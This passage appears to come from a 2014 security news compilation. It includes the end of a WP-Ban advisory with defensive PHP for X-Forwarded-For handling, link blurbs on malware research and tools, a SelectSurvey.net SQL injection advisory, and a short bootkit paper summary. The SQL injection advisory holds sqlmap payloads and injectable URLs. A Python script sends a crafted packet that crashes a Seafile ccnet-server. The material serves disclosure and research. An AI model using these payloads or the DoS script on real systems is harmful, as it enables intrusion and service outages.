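// Added example, not WP-Ban code. Proxy list and request arrays are constructed.

/**
 * Determine the client address for ban checks.
 * $server is $_SERVER (or a constructed equivalent); $trusted_proxies lists
 * the reverse proxies that are allowed to speak for the client.
 */
function client_ip(array $server, array $trusted_proxies)
{
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';

    // No trusted proxy in front of us: the TCP peer is the client and any
    // X-Forwarded-For header was written by that client. Ignore it.
    if (!in_array($remote, $trusted_proxies, true)) {
        return $remote;
    }

    $xff = isset($server['HTTP_X_FORWARDED_FOR']) ? $server['HTTP_X_FORWARDED_FOR'] : '';
    if ($xff === '') {
        return $remote;
    }

    // Each proxy appends the peer address it saw, so walk the chain from the
    // right: the first address that is not one of our proxies is the client.
    $hops = array_reverse(array_map('trim', explode(',', $xff)));
    foreach ($hops as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            // Not an IP address at all (e.g. 999.999.999.999 from the PoC):
            // the chain is untrustworthy, fall back to the peer address.
            return $remote;
        }
        if (!in_array($hop, $trusted_proxies, true)) {
            return $hop;
        }
    }
    return $remote;
}

function is_banned($ip, array $banned)
{
    return in_array($ip, $banned, true);
}

// Constructed requests mirroring the PoC. 127.0.0.1 is the banned address.
$banned  = ['127.0.0.1'];
$proxies = ['10.0.0.5'];   // assumption: the site's own reverse proxy

$requests = [
    // 1. No proxy; the banned client sends a spoofed header directly.
    ['REMOTE_ADDR' => '127.0.0.1', 'HTTP_X_FORWARDED_FOR' => '999.999.999.999'],
    // 2. Behind the proxy; the proxy added the banned client's address.
    ['REMOTE_ADDR' => '10.0.0.5',  'HTTP_X_FORWARDED_FOR' => '127.0.0.1'],
    // 3. Behind the proxy; the banned client pre-seeded the header with an
    //    innocent address, which the proxy then appended its own view to.
    ['REMOTE_ADDR' => '10.0.0.5',  'HTTP_X_FORWARDED_FOR' => '198.51.100.1, 127.0.0.1'],
];

foreach ($requests as $req) {
    $ip = client_ip($req, $proxies);
    printf("peer %-10s xff %-28s -> %-12s %s\n",
        $req['REMOTE_ADDR'], $req['HTTP_X_FORWARDED_FOR'], $ip,
        is_banned($ip, $banned) ? 'banned' : 'allowed');
}
```

Without a trusted-proxy list there is no safe way to use X-Forwarded-For, which is why the plugin's "I am using a reverse proxy" checkbox is only half the fix: the proxy must also be the one writing the header, and the application must know the proxy's address so that a client-supplied header seen on a direct connection is ignored.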

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2014-08-27: Discovered
2014-09-04: Reported to vendor by email
2014-09-04: Requested CVE
2014-09-04: Vendor responded
2014-09-17: Vendor reported a fixed version released
2014-09-17: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

Salesforce Dyre Variant – Research & Analysis

Hi, I’m Tomer Schwartz, director of security research at Adallom Labs. As you probably know by now, a bit over a week ago, Salesforce.com announced they detected a new variant of Dyre (aka Dyreza) that was targeting Salesforce user credentials. Since many of our customers rely on us to secure their users and data inside of Salesforce.com, we were inundated with questions about the ramifications and intent of the malware. We’ve spent the last week trying to take a closer look at the Dyre malware variant that Salesforce.com pointed us to in order to provide actionable information to our customers, and I wanted to share our results in this post in case the rest of you are curious (there’s some important stuff inside, but not what you might expect). First, let’s start off with an intro to Dyre

more here................http://www.adallom.com/blog/salesforce-dyre-variant-research-analysis/

UFONet

UFONet is a shell client designed to launch DDoS attacks against a target, using CSRF/XSS vectors on third-party web applications, like a botnet. It allows the use of a proxy to manage 'zombies'.

more here..........https://github.com/epsylon/ufonet

THC-SmartBrute

Finds undocumented and secret commands implemented in a smartcard

more here...............https://www.thc.org/thc-smartbrute/

Multiple SQL Injection Vulnerabilities in ClassApps SelectSurvey.net

Details
==========
Software: ClassApps SelectSurvey.net
Description: Multiple SQL Injection Vulnerabilities
Version: 4.124.004
Homepage: https://www.classapps.com/SelectSurveyNETOverview.asp
Vendor Fix: 4.125.002
CVE: 2014-6030

Timeline
==========
Aug 28 2014 - Vendor Notified
Aug 28 2014 - CVE Requested
Aug 28 2014 - Vendor Response
Sep 01 2014 - CVE Assigned
Sep 01 2014 - Upgraded Version Released
Sep 17 2014 - Disclosure

Description
==========
SelectSurvey.net is a web-based survey application written in ASP.net
and C#. It is vulnerable to multiple SQL injection attacks, both
authenticated and unauthenticated. The authenticated vulnerability
resides within the file upload script, as the parameters are not
sanitized prior to being placed into the SQL query. ClassApps had
previously listed 'SQL injection protection' as a feature and did have
several functions in place to attempt to prevent such attacks but due to
using a "blacklisting" approach, it is possible to circumvent these
functions. These functions are used elsewhere throughout the application
to protect GET request variables but are not sufficient. Only this
specific version of the application has been tested but it is highly
likely these vulnerabilities exist within prior versions. It has not
been confirmed that these vulnerabilities are fixed. The vendor stated
that they would be fixed in this new release however, they do not allow
download of the code unless you are a customer so fixes have not been
verified.

Examples
==========
/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]
(unauthenticated)
/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]
(authenticated)

sqlmap identified the following injection points:
---
Place: GET
Parameter: SurveyID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
---
[14:01:39] [INFO] testing Microsoft SQL Server
[14:01:39] [INFO] confirming Microsoft SQL Server
[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
[14:01:39] [INFO] fetching banner
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS operating system: Windows 7 Service Pack 1
back-end DBMS: Microsoft SQL Server 2008
banner:
---
Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
    Jun 28 2012 08:36:30
    Copyright (c) Microsoft Corporation
    Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
Service Pack 1)
---

ccnet-server remote DoS (assert) seafile-server 3.1.5

# Exploit Title: ccnet-server remote DoS (assert) in seafile-server  3.1.5
# Date: Sep 4, 2014
# Exploit Author: retset
# Vendor Homepage: seafile.com
# Software Link:
https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz
# Version: seafile-server 3.1.4
# Tested on: Windows 7/seafile-server 3.1.5

import socket
import sys

# Usage: python3 ccnet_dos.py <server-ip>
ip = sys.argv[1]
addr = (ip, 10001)          # ccnet-server listener
s = socket.create_connection(addr)

# 8-byte header whose last two bytes are 0x03e8 (1000), followed by 1001
# NUL bytes: one more byte than the header appears to announce. ccnet-server
# fails an assert on this input and terminates.
dos = b'\x00\x04\x00\x00\x00\x00\x03\xe8'
dos += b'\x00' * 1001

s.sendall(dos)
print(repr(s.recv(1024)))   # whatever the server returns before it aborts

s.close()


#@retset





Invisible.im

Invisible.im is a coalition of security experts, developers, and a tech journalist that was established to develop an instant messenger and file transfer tool that leaves virtually no evidence of conversations or transfers having occurred. Invisible.im's goal is to create a messenger platform that generates no meaningful, third-party metadata.

more here...........http://invisible.im/

Paper: Exposing Bootkits with BIOS Emulation

The security features added in modern 64-bit versions of Windows raise the bar for kernel mode rootkits. The introduction of Driver Signature Enforcement prevents malware from loading an unsigned kernel mode driver. PatchGuard was introduced to protect the integrity of the running kernel, in order to prevent rootkits from modifying critical structures or hooking system calls. Although time has shown that these security measures are not perfect, and may in fact be bypassed while actively running, an alternative approach is to subvert the system by running code before any of the security features kick in.

Secure Boot has been introduced to protect the integrity of the boot process. However, the model only works when booting from signed firmware (UEFI). Legacy BIOS systems are still vulnerable. The Master Boot Record, Volume Boot Record, and the bootstrap code all reside in unsigned sectors on disk, with no security features in place to protect them from modification.

Using a combination of low level anti-rootkit techniques, emulation, and heuristic detection logic, we have devised a way to detect anomalies in the boot sectors for the purpose of detecting the presence of bootkits.

more here............https://www.blackhat.com/docs/us-14/materials/us-14-Haukli-Exposing-Bootkits-With-BIOS-Emulation-WP.pdf

Your iOS 8 Data is Not Beyond Law Enforcement’s Reach… Yet.

In a recent announcement, Apple stated that they no longer unlock iOS (8) devices for law enforcement.

“On devices running iOS 8, your personal data such as photos, messages (including attachments), email, contacts, call history, iTunes content, notes, and reminders is placed under the protection of your passcode. Unlike our competitors, Apple cannot bypass your passcode and therefore cannot access this data. So it’s not technically feasible for us to respond to government warrants for the extraction of this data from devices in their possession running iOS 8.”

This is a significantly pro-privacy (and courageous) posture Apple is taking with their devices, and while about seven years late, is more than welcome. In fact, I am very impressed with Apple’s latest efforts to beef up security all around, including iOS 8 and iCloud’s new 2Fa. I believe Tim Cook to be genuine in his commitment to user privacy; perhaps I’m one of the few who can see just how gutsy this move with iOS 8 is.


more here.................http://www.zdziarski.com/blog/?p=3875